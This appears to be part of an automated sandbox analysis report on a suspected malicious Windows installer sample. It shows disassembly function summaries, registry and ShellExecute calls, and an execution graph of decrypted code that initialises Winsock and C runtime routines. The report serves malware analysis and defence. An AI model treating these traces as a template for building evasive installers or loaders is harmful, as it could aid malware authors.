                                                            • RegCloseKey.ADVAPI32(?,00478E9A,?,?,00000001,00000000,00000000,00478EB5), ref: 00478E83
                                                            Strings
                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478E0E
                                                            • %s\%s_is1, xrefs: 00478E2C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                            • API String ID: 47109696-1598650737
                                                            • Opcode ID: 3c218534b7aea35313477da1420f505f75d4b79f6803eaf18b753309f41f968f
                                                            • Instruction ID: 403b8390735a8e98fed73365c843d129082673b7d0193522817cb9849c55968d
                                                            • Opcode Fuzzy Hash: 3c218534b7aea35313477da1420f505f75d4b79f6803eaf18b753309f41f968f
                                                            • Instruction Fuzzy Hash: 79218470B40208AFDB01DFAACC55A9EBBE8EB48304F90847EE904E7381DB785D018A59
                                                            APIs
                                                            • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501E9
                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045021A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ExecuteMessageSendShell
                                                            • String ID: open
                                                            • API String ID: 812272486-2758837156
                                                            • Opcode ID: adeb5e276340ad6fa3d53176e38ffb5e58c1499704c489fbf40d86a9362c05b3
                                                            • Instruction ID: 6e2feb9b457cb976a84d54f3b3258ed3b08e14d6ba220cef3ebd8abcd6e201e4
                                                            • Opcode Fuzzy Hash: adeb5e276340ad6fa3d53176e38ffb5e58c1499704c489fbf40d86a9362c05b3
                                                            • Instruction Fuzzy Hash: 62219474E40208AFDB00DFA5C886B9EB7F8EB44705F2081BAB514E7282D7789E05CB58
                                                            APIs
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00455318
                                                            • GetLastError.KERNEL32(0000003C,00000000,00455361,?,?,00000001,00000001), ref: 00455329
                                                              • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: DirectoryErrorExecuteLastShellSystem
                                                            • String ID: <
                                                            • API String ID: 893404051-4251816714
                                                            • Opcode ID: 57012810d142c3df1a5160bec437aa7c33a0c7c828d826884eb3f35a8728d1b1
                                                            • Instruction ID: ea799879bbb6ab716a70283d096866571a468ac1fa4b8cc73728b10af3e72d10
                                                            • Opcode Fuzzy Hash: 57012810d142c3df1a5160bec437aa7c33a0c7c828d826884eb3f35a8728d1b1
                                                            • Instruction Fuzzy Hash: 02215370A00609ABDB10DFA5D8926AE7BF8AF18355F50443AFC44E7281D7789949CB58
                                                            APIs
                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021C5E48,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021C5E48,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021C5E48,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021C5E48,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                            • String ID: )
                                                            • API String ID: 2227675388-1084416617
                                                            • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                            • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                            • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                            • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496539
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Window
                                                            • String ID: /INITPROCWND=$%x $@
                                                            • API String ID: 2353593579-4169826103
                                                            • Opcode ID: 552611a81f91654fc44d41bb0f0c519a98a2c07263e337a61ce07e3eab6c417a
                                                            • Instruction ID: 8ac61a852f64af84e8a4d996ffe215da0ea6a1f7c0dd4c2642a2787a2d41e8fe
                                                            • Opcode Fuzzy Hash: 552611a81f91654fc44d41bb0f0c519a98a2c07263e337a61ce07e3eab6c417a
                                                            • Instruction Fuzzy Hash: C711A531A043089FDB01DF64E855BAE7BE8EB48324F52847BE404E7281DB3CE905CA58
                                                            APIs
                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                            • SysFreeString.OLEAUT32(?), ref: 004474D6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: String$AllocByteCharFreeMultiWide
                                                            • String ID: NIL Interface Exception$Unknown Method
                                                            • API String ID: 3952431833-1023667238
                                                            • Opcode ID: 258d3c6477c64922ebec54d5f4264d59c03dbf12c3c57b46792931bb3fd1eaaf
                                                            • Instruction ID: aafd2560cbf8ba646f5ae6954b41d26adab4393ec7197c17a1bba45f9511721b
                                                            • Opcode Fuzzy Hash: 258d3c6477c64922ebec54d5f4264d59c03dbf12c3c57b46792931bb3fd1eaaf
                                                            • Instruction Fuzzy Hash: 0811D6306042049FEB10DFA59D42A6EBBACEB49704F91403AF504E7681C7789D01CB69
                                                            APIs
                                                            • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD88
                                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDC8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Value$EnumQuery
                                                            • String ID: Inno Setup: No Icons
                                                            • API String ID: 1576479698-2016326496
                                                            • Opcode ID: e0e38617d7780f69d75f26860b1501b2527d54a68fe4bf3310a8a6dfd5a7631c
                                                            • Instruction ID: 05ef73584c9e0c756a5fead926ccd29af3c260b6948a855c27afe474e1c18ecb
                                                            • Opcode Fuzzy Hash: e0e38617d7780f69d75f26860b1501b2527d54a68fe4bf3310a8a6dfd5a7631c
                                                            • Instruction Fuzzy Hash: B2012B36F5A77179F73046256D02BBB56888B82B60F68453BF940EA2C0D6589C04C36E
                                                            APIs
                                                              • Part of subcall function 004555D0: GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                              • Part of subcall function 004555D0: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                            • SetForegroundWindow.USER32(?), ref: 00497266
                                                            Strings
                                                            • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 00497291
                                                            • Restarting Windows., xrefs: 00497243
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentForegroundOpenTokenWindow
                                                            • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                            • API String ID: 3179053593-4147564754
                                                            • Opcode ID: 699fd1f27132e499a72d678966239612eac8b61dfe9d57f4c88cf0c32b356d0f
                                                            • Instruction ID: f042dff5c045186d33be5417afa4f05d679b9763972d2bb00463d131ea403ed4
                                                            • Opcode Fuzzy Hash: 699fd1f27132e499a72d678966239612eac8b61dfe9d57f4c88cf0c32b356d0f
                                                            • Instruction Fuzzy Hash: FD01D8706282406BEB00EB65E981B9C3F99AB5430CF5040BBF900A72D3D73C9945871D
                                                            APIs
                                                              • Part of subcall function 0047CD84: FreeLibrary.KERNEL32(73F70000,004814B7), ref: 0047CD9A
                                                              • Part of subcall function 0047CA54: GetTickCount.KERNEL32 ref: 0047CA9E
                                                              • Part of subcall function 004570CC: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570EB
                                                            • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049832B), ref: 00497A29
                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049832B), ref: 00497A2F
                                                            Strings
                                                            • Detected restart. Removing temporary directory., xrefs: 004979E3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                            • String ID: Detected restart. Removing temporary directory.
                                                            • API String ID: 1717587489-3199836293
                                                            • Opcode ID: e611eeaa9fed28cadb8c69ef2edffd8a52967f1f4ce985551ff58b7f7fd4f302
                                                            • Instruction ID: 93f06bea8fcfa1b224d7ac257058da4e76460d04d1e35911cc499d3d1c0dfa98
                                                            • Opcode Fuzzy Hash: e611eeaa9fed28cadb8c69ef2edffd8a52967f1f4ce985551ff58b7f7fd4f302
                                                            • Instruction Fuzzy Hash: 51E0553120C3002EDA02B7B2BC52A2F7F8CD701728311083BF40882452C43D1810C77D
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastSleep
                                                            • String ID:
                                                            • API String ID: 1458359878-0
                                                            • Opcode ID: 11e49af8eca5aab8e77903997d46822470632a6293514e89f51700c73713890d
                                                            • Instruction ID: a2606c7dd4c17da0a3c90c20a229de96912268129783a4208f21052e6a4fbdd3
                                                            • Opcode Fuzzy Hash: 11e49af8eca5aab8e77903997d46822470632a6293514e89f51700c73713890d
                                                            • Instruction Fuzzy Hash: 62F02436B01D64578F20A59E998193F63DDEA94376750013BFC0CDB303D438CC098AA9

                                                            Execution Graph

                                                            Execution Coverage:3.5%
                                                            Dynamic/Decrypted Code Coverage:71.3%
                                                            Signature Coverage:11.3%
                                                            Total number of Nodes:1148
                                                            Total number of Limit Nodes:47
                                                            execution_graph 19321 402341 19322 402872 CreateDirectoryA 19321->19322 19323 40d585 19322->19323 19324 40d58b RegCloseKey 19325 2c2104d 19330 2c333b4 19325->19330 19336 2c332b8 19330->19336 19332 2c21057 19333 2c21aa9 InterlockedIncrement 19332->19333 19334 2c21ac5 WSAStartup InterlockedExchange 19333->19334 19335 2c2105c 19333->19335 19334->19335 19337 2c332c4 __mtinitlocknum 19336->19337 19344 2c385a2 19337->19344 19343 2c332eb __mtinitlocknum 19343->19332 19361 2c388fd 19344->19361 19346 2c332cd 19347 2c332fc RtlDecodePointer RtlDecodePointer 19346->19347 19348 2c332d9 19347->19348 19349 2c33329 19347->19349 19358 2c332f6 19348->19358 19349->19348 19660 2c3916d 19349->19660 19351 2c3338c RtlEncodePointer RtlEncodePointer 19351->19348 19352 2c33360 19352->19348 19355 2c38b0b __realloc_crt 62 API calls 19352->19355 19356 2c3337a RtlEncodePointer 19352->19356 19353 2c3333b 19353->19351 19353->19352 19667 2c38b0b 19353->19667 19357 2c33374 19355->19357 19356->19351 19357->19348 19357->19356 19694 2c385ab 19358->19694 19362 2c38921 RtlEnterCriticalSection 19361->19362 19363 2c3890e 19361->19363 19362->19346 19368 2c38985 19363->19368 19365 2c38914 19365->19362 19390 2c3844f 19365->19390 19369 2c38991 __mtinitlocknum 19368->19369 19382 2c389b0 19369->19382 19397 2c386e3 19369->19397 19375 2c389a6 19441 2c3832c 19375->19441 19376 2c389ce 19449 2c35e6b 19376->19449 19377 2c389dd 19381 2c388fd __lock 59 API calls 19377->19381 19378 2c389d3 __mtinitlocknum 19378->19365 19383 2c389e4 19381->19383 19382->19378 19444 2c38ac4 19382->19444 19384 2c389f1 19383->19384 19385 2c38a09 19383->19385 19452 2c3921c 19384->19452 19455 2c32f84 19385->19455 19388 2c389fd 19461 2c38a25 19388->19461 19391 2c386e3 __FF_MSGBANNER 59 API calls 19390->19391 19392 2c38457 19391->19392 19393 2c38740 __NMSG_WRITE 59 API calls 19392->19393 19394 2c3845f 19393->19394 19630 2c384fe 19394->19630 19464 2c4018e 19397->19464 19399 2c386ea 19400 2c386f7 19399->19400 19401 2c4018e __FF_MSGBANNER 59 API calls 19399->19401 19402 2c38740 __NMSG_WRITE 59 API calls 19400->19402 19404 2c38719 19400->19404 19401->19400 19403 2c3870f 19402->19403 19405 2c38740 __NMSG_WRITE 59 API calls 19403->19405 19406 2c38740 19404->19406 19405->19404 19407 2c3875e __NMSG_WRITE 19406->19407 19409 2c4018e __FF_MSGBANNER 55 API calls 19407->19409 19440 2c38885 19407->19440 19411 2c38771 19409->19411 19410 2c388ee 19410->19375 19412 2c3888a GetStdHandle 19411->19412 19413 2c4018e __FF_MSGBANNER 55 API calls 19411->19413 19416 2c38898 _strlen 19412->19416 19412->19440 19414 2c38782 19413->19414 19414->19412 19415 2c38794 19414->19415 19415->19440 19486 2c3f54d 19415->19486 19419 2c388d1 WriteFile 19416->19419 19416->19440 19419->19440 19420 2c388f2 19423 2c34f15 __invoke_watson 8 API calls 19420->19423 19421 2c387c1 GetModuleFileNameW 19422 2c387e1 19421->19422 19428 2c387f1 __NMSG_WRITE 19421->19428 19424 2c3f54d __NMSG_WRITE 55 API calls 19422->19424 19425 2c388fc 19423->19425 19424->19428 19426 2c38921 RtlEnterCriticalSection 19425->19426 19429 2c38985 __mtinitlocknum 55 API calls 19425->19429 19426->19375 19427 2c38837 19427->19420 19504 2c3f4e1 19427->19504 19428->19420 19428->19427 19495 2c3f5c2 19428->19495 19431 2c38914 19429->19431 19431->19426 19435 2c3844f __amsg_exit 55 API calls 19431->19435 19434 2c3f4e1 __NMSG_WRITE 55 API calls 19436 2c3886e 19434->19436 19437 2c38920 19435->19437 19436->19420 19438 2c38875 19436->19438 19437->19426 19513 2c401ce RtlEncodePointer 19438->19513 19538 2c3455b 19440->19538 19553 2c382f8 GetModuleHandleExW 19441->19553 19446 2c38ad2 19444->19446 19447 2c389c7 19446->19447 19556 2c32fbc 19446->19556 19573 2c39515 Sleep 19446->19573 19447->19376 19447->19377 19576 2c35c82 GetLastError 19449->19576 19451 2c35e70 19451->19378 19453 2c39239 InitializeCriticalSectionAndSpinCount 19452->19453 19454 2c3922c 19452->19454 19453->19388 19454->19388 19456 2c32fb6 __dosmaperr 19455->19456 19457 2c32f8d HeapFree 19455->19457 19456->19388 19457->19456 19458 2c32fa2 19457->19458 19459 2c35e6b __mtinitlocknum 57 API calls 19458->19459 19460 2c32fa8 GetLastError 19459->19460 19460->19456 19629 2c38a67 RtlLeaveCriticalSection 19461->19629 19463 2c38a2c 19463->19378 19465 2c40198 19464->19465 19466 2c401a2 19465->19466 19467 2c35e6b __mtinitlocknum 59 API calls 19465->19467 19466->19399 19468 2c401be 19467->19468 19471 2c34f05 19468->19471 19474 2c34eda RtlDecodePointer 19471->19474 19475 2c34eed 19474->19475 19480 2c34f15 IsProcessorFeaturePresent 19475->19480 19478 2c34eda __filbuf 8 API calls 19479 2c34f11 19478->19479 19479->19399 19481 2c34f20 19480->19481 19482 2c34da8 __call_reportfault 7 API calls 19481->19482 19483 2c34f35 19482->19483 19484 2c39523 ___raise_securityfailure GetCurrentProcess TerminateProcess 19483->19484 19485 2c34f04 19484->19485 19485->19478 19487 2c3f566 19486->19487 19488 2c3f558 19486->19488 19489 2c35e6b __mtinitlocknum 59 API calls 19487->19489 19488->19487 19492 2c3f57f 19488->19492 19490 2c3f570 19489->19490 19491 2c34f05 __filbuf 9 API calls 19490->19491 19493 2c387b4 19491->19493 19492->19493 19494 2c35e6b __mtinitlocknum 59 API calls 19492->19494 19493->19420 19493->19421 19494->19490 19498 2c3f5d0 19495->19498 19496 2c3f5d4 19497 2c35e6b __mtinitlocknum 59 API calls 19496->19497 19499 2c3f5d9 19496->19499 19503 2c3f604 19497->19503 19498->19496 19498->19499 19500 2c3f613 19498->19500 19499->19427 19500->19499 19502 2c35e6b __mtinitlocknum 59 API calls 19500->19502 19501 2c34f05 __filbuf 9 API calls 19501->19499 19502->19503 19503->19501 19505 2c3f4fb 19504->19505 19507 2c3f4ed 19504->19507 19506 2c35e6b __mtinitlocknum 59 API calls 19505->19506 19512 2c3f505 19506->19512 19507->19505 19510 2c3f527 19507->19510 19508 2c34f05 __filbuf 9 API calls 19509 2c38857 19508->19509 19509->19420 19509->19434 19510->19509 19511 2c35e6b __mtinitlocknum 59 API calls 19510->19511 19511->19512 19512->19508 19514 2c40202 ___crtIsPackagedApp 19513->19514 19515 2c402c1 IsDebuggerPresent 19514->19515 19516 2c40211 LoadLibraryExW 19514->19516 19519 2c402e6 19515->19519 19520 2c402cb 19515->19520 19517 2c4024e GetProcAddress 19516->19517 19518 2c40228 GetLastError 19516->19518 19522 2c40262 7 API calls 19517->19522 19528 2c402de 19517->19528 19521 2c40237 LoadLibraryExW 19518->19521 19518->19528 19524 2c402d9 19519->19524 19525 2c402eb RtlDecodePointer 19519->19525 19523 2c402d2 OutputDebugStringW 19520->19523 19520->19524 19521->19517 19521->19528 19526 2c402be 19522->19526 19527 2c402aa GetProcAddress RtlEncodePointer 19522->19527 19523->19524 19524->19528 19529 2c40312 RtlDecodePointer RtlDecodePointer 19524->19529 19536 2c4032a 19524->19536 19525->19528 19526->19515 19527->19526 19532 2c3455b TranslatorGuardHandler 6 API calls 19528->19532 19529->19536 19530 2c4034e RtlDecodePointer 19530->19528 19531 2c40362 RtlDecodePointer 19531->19530 19534 2c40369 19531->19534 19535 2c403b0 19532->19535 19534->19530 19537 2c4037a RtlDecodePointer 19534->19537 19535->19440 19536->19530 19536->19531 19537->19530 19539 2c34563 19538->19539 19540 2c34565 IsProcessorFeaturePresent 19538->19540 19539->19410 19542 2c3959f 19540->19542 19545 2c3954e IsDebuggerPresent 19542->19545 19546 2c39563 __call_reportfault 19545->19546 19551 2c39538 SetUnhandledExceptionFilter UnhandledExceptionFilter 19546->19551 19548 2c3956b __call_reportfault 19552 2c39523 GetCurrentProcess TerminateProcess 19548->19552 19550 2c39588 19550->19410 19551->19548 19552->19550 19554 2c38311 GetProcAddress 19553->19554 19555 2c38323 ExitProcess 19553->19555 19554->19555 19557 2c33037 19556->19557 19563 2c32fc8 19556->19563 19558 2c38213 __calloc_impl RtlDecodePointer 19557->19558 19559 2c3303d 19558->19559 19560 2c35e6b __mtinitlocknum 58 API calls 19559->19560 19572 2c3302f 19560->19572 19561 2c386e3 __FF_MSGBANNER 58 API calls 19566 2c32fd3 19561->19566 19562 2c32ffb RtlAllocateHeap 19562->19563 19562->19572 19563->19562 19565 2c33023 19563->19565 19563->19566 19570 2c33021 19563->19570 19574 2c38213 RtlDecodePointer 19563->19574 19564 2c38740 __NMSG_WRITE 58 API calls 19564->19566 19568 2c35e6b __mtinitlocknum 58 API calls 19565->19568 19566->19561 19566->19563 19566->19564 19569 2c3832c __mtinitlocknum 3 API calls 19566->19569 19568->19570 19569->19566 19571 2c35e6b __mtinitlocknum 58 API calls 19570->19571 19571->19572 19572->19446 19573->19446 19575 2c38226 19574->19575 19575->19563 19590 2c391db 19576->19590 19578 2c35c97 19579 2c35ce5 SetLastError 19578->19579 19593 2c38a7c 19578->19593 19579->19451 19583 2c35cbe 19584 2c35cc4 19583->19584 19585 2c35cdc 19583->19585 19602 2c35cf1 19584->19602 19586 2c32f84 _free 56 API calls 19585->19586 19588 2c35ce2 19586->19588 19588->19579 19589 2c35ccc GetCurrentThreadId 19589->19579 19591 2c391f2 TlsGetValue 19590->19591 19592 2c391ee 19590->19592 19591->19578 19592->19578 19595 2c38a83 19593->19595 19596 2c35caa 19595->19596 19598 2c38aa1 19595->19598 19612 2c404c8 19595->19612 19596->19579 19599 2c391fa 19596->19599 19598->19595 19598->19596 19620 2c39515 Sleep 19598->19620 19600 2c39210 19599->19600 19601 2c39214 TlsSetValue 19599->19601 19600->19583 19601->19583 19603 2c35cfd __mtinitlocknum 19602->19603 19604 2c388fd __lock 59 API calls 19603->19604 19605 2c35d3a 19604->19605 19621 2c35d92 19605->19621 19608 2c388fd __lock 59 API calls 19609 2c35d5b ___addlocaleref 19608->19609 19624 2c35d9b 19609->19624 19611 2c35d86 __mtinitlocknum 19611->19589 19613 2c404d3 19612->19613 19614 2c404ee 19612->19614 19613->19614 19615 2c404df 19613->19615 19617 2c404fe RtlAllocateHeap 19614->19617 19618 2c404e4 19614->19618 19619 2c38213 __calloc_impl RtlDecodePointer 19614->19619 19616 2c35e6b __mtinitlocknum 58 API calls 19615->19616 19616->19618 19617->19614 19617->19618 19618->19595 19619->19614 19620->19598 19627 2c38a67 RtlLeaveCriticalSection 19621->19627 19623 2c35d54 19623->19608 19628 2c38a67 RtlLeaveCriticalSection 19624->19628 19626 2c35da2 19626->19611 19627->19623 19628->19626 19629->19463 19633 2c385b4 19630->19633 19632 2c3846a 19634 2c385c0 __mtinitlocknum 19633->19634 19635 2c388fd __lock 52 API calls 19634->19635 19636 2c385c7 19635->19636 19637 2c38680 __cinit 19636->19637 19638 2c385f5 RtlDecodePointer 19636->19638 19653 2c386ce 19637->19653 19638->19637 19640 2c3860c RtlDecodePointer 19638->19640 19648 2c3861c 19640->19648 19642 2c386dd __mtinitlocknum 19642->19632 19644 2c386c5 19646 2c386ce 19644->19646 19647 2c3832c __mtinitlocknum 3 API calls 19644->19647 19645 2c38629 RtlEncodePointer 19645->19648 19650 2c386db 19646->19650 19658 2c38a67 RtlLeaveCriticalSection 19646->19658 19647->19646 